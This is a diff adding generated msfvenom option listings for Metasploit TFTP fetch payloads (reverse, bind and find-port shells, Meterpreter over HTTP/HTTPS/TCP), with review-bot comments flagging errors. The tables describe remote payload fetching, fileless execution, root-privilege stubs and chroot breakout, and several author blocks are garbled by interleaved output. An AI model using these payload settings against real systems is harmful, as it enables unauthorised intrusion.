https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the 
functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_bind_tcp.txt new file mode 100644 index 0000000..bf142e4 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_bind_tcp.txt 
@@ -0,0 +1,78 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/tftp/ppc64/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME gGIOtGxkQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from a TFTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
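Review bot: "Total size: 0" in the header of cmd-linux-tftp-ppc64-shell_bind_tcp.txt (and again in the ppc64 shell_find_port dump that follows) looks like a failed generation rather than a real size; every other TFTP fetch variant in this patch reports a non-zero size (105, 102, 111, 108). Re-run the generator for the ppc64 payloads and confirm a non-zero size before committing these files, otherwise the catalog records an option listing for a payload that msfvenom did not actually build. A size check in the generator (fail or skip the file when the reported size is 0) would stop this recurring.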
diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_find_port.txt new file mode 100644 index 0000000..e202f39 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_find_port.txt 
@@ -0,0 +1,77 @@ + + Name: TFTP Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/tftp/ppc64/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 14265 no The local client port +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME qXXwjWOSZEAq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from a TFTP server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
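Review bot: the AppendExit row reads 'AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root)', which does not describe an append-exit stub; the description looks copied from a chroot-break option, and since this text is generated from module metadata the fix belongs in the payload's option definition, after which this file should be regenerated. Also in this hunk: the FETCH_FILELESS description has an unclosed parenthesis ('requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)'), and 'Total size: 0' again indicates the ppc64 payload was not generated at capture time.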
diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_reverse_tcp.txt new file mode 100644 index 0000000..2b4a1a3 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc64-shell_reverse_tcp.txt 
@@ -0,0 +1,85 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/ppc64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Ramon de C Valle + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME MtuvaTaMdXW no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC64 payload from a TFTP server. 
+ Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes 
the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_http.txt new file mode 100644 index 0000000..1405f1b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_http.txt 
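Review bot: FETCH_SRVHOST is marked 'no' (not required) in this reverse_tcp file but 'yes' in the bind_tcp and find_port files of the same patch; if the reverse variant falls back to LHOST when FETCH_SRVHOST is unset, the option description 'Local IP to use for serving payload' should say so, otherwise a reader cannot tell which address the fetch server binds. Two wording defects carried over from the option metadata: 'FetchListenerBindAddress no The specific IP address to bind to to serve the payload' has a doubled 'to', and 'Allow reverse tcp even with Proxies specified' mixes capitalisation. 'Total size: 0' applies here as in the other ppc64 files.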
@@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_http: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME QnbtsyKEP no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_https.txt new file mode 100644 index 0000000..9e37030 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_https.txt 
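Review bot: the defaults in this file collide: 'FETCH_SRVPORT 8080 yes Local port to use for serving payload' and 'LPORT 8080 yes The local listener port' mean that with LHOST and FETCH_SRVHOST on the same interface the fetch web server and the HTTP handler would both try to bind 8080; either the generator should warn on this, or the file and the module docs should state that one of the two ports must be changed. The 'Provided by' block is also corrupted: it shows 'B', then the 'Evasion options for payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_http:' header with its underline, then '@rapid7.com>' and 'timwr', so the author list and the evasion-options section were interleaved when the output was captured; regenerate with stdout and stderr captured in order or to separate files. Finally, the HttpUnknownRequestResponse default appears split across lines as a bare 'It works!' with no surrounding markup, so check that the committed file holds the full default value.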
@@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Br +Evasion options for payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_https: +========================= + +apid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME OQtwRRKi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the 
payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..94c5e91 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc64le-meterpreter_reverse_tcp.txt 
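Review bot: same capture corruption as the reverse_http file: 'Provided by:' is followed by 'Br', the 'Evasion options for payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_https:' header, and then 'apid7.com>' and 'timwr', so the author list is unusable and the file should be regenerated. Since these files will be read as a reference for the payload's defaults, two security-relevant rows deserve a sentence in the accompanying docs: 'StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter' means the stager accepts any handler certificate unless changed, and the SSLVersion accepted list still offers SSL3, TLS1 and TLS1.1 even though the default is Auto.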
@@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/ppc64le/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME OiezjeDE no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a PPC64LE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the 
functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no 